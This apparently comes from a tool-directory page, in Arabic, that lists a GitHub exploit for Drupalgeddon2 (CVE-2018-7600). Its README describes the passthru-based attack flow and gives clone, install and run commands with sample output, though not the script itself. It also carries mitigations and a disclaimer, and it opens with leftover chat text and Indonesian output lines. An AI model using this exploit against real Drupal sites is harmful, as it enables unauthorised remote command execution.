Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-7600 — برنامج بايثون لتنفيذ RCE على دروبال الإصدار 7.56 | Kitploit
أدوات/GitHubGitHub/xxxtectationxxx/cve-2018-7600
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubxxxtectationxxx/cve-2018-7600

CVE-2018-7600

برنامج بايثون لتنفيذ RCE على دروبال الإصدار 7.56

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

جاهز يا ديفا، لقد أضفت أيضًا قسم الاستخدام بدءًا من git clone، لذا أصبح ملف README كاملاً. هذه هي النسخة النهائية التي عليك فقط نسخها ولصقها في README.md في مستودع GitHub الخاص بك.

CVE-2018-7600 - استغلال Drupalgeddon2 RCE

يستغل هذا الاستغلال ثغرة Drupal 7.56 (وبعض الإصدارات السابقة) المعروفة باسم Drupalgeddon2.
تسمح هذه الثغرة بتنفيذ الأوامر عن بُعد (Remote Code Execution (RCE)) بدون مصادقة من خلال استغلال ثغرة في نموذج ضعيف.

🔗 المستودع: https://github.com/xxxTectationxxx/CVE-2018-7600


⚠️ تحذير

تم إنشاء هذا السكريبت لأغراض تعليمية فقط ولاختبار في بيئة مختبرية.
يمنع استخدامه على أنظمة ليس لديها إذن رسمي للاختبار.


🎯 الإصدارات المستهدفة

  • Drupal 7.x (بما في ذلك 7.56) غير المصححة.
  • قد يعمل أيضًا على بعض الإصدارات المبكرة من Drupal 8.

📜 طريقة العمل المختصرة

  1. إرسال الحمولة إلى نقطة النهاية user/password مع معلمات تؤدي إلى تشغيل دالة في PHP.
passthru()
  • استخراج form_build_id من استجابة الخادم.
  • إرسال طلب ثانٍ لتنفيذ الأمر حسب المطلوب.

  • 📦 التثبيت والاستخدام

    استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
    cd CVE-2018-7600
    

    تثبيت التبعيات:

    root@kitploit:~
    pip install requests
    

    تشغيل الاستغلال:

    root@kitploit:~
    python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
    

    مثال:

    root@kitploit:~
    python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
    

    💻 مثال على الإخراج

    root@kitploit:~
    [*] Mengirim payload awal ke target...
    [+] form_build_id ditemukan: form-ABC123XYZ
    [+] Output command:
    www-data
    

    🛡️ التخفيف

    • تحديث Drupal إلى أحدث إصدار.
    • تطبيق التصحيحات الأمنية الرسمية من Drupal.
    • تقييد الوصول إلى الخادم أثناء عملية الإصلاح.

    📚 المراجع

    • Drupal Security Advisory SA-CORE-2018-002
    • Exploit-DB Entry #44449

    إخلاء المسؤولية: لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذا السكريبت. استخدمه بحكمة وفقط على الأنظمة المصرح باختبارها.

    تنزيل الأداة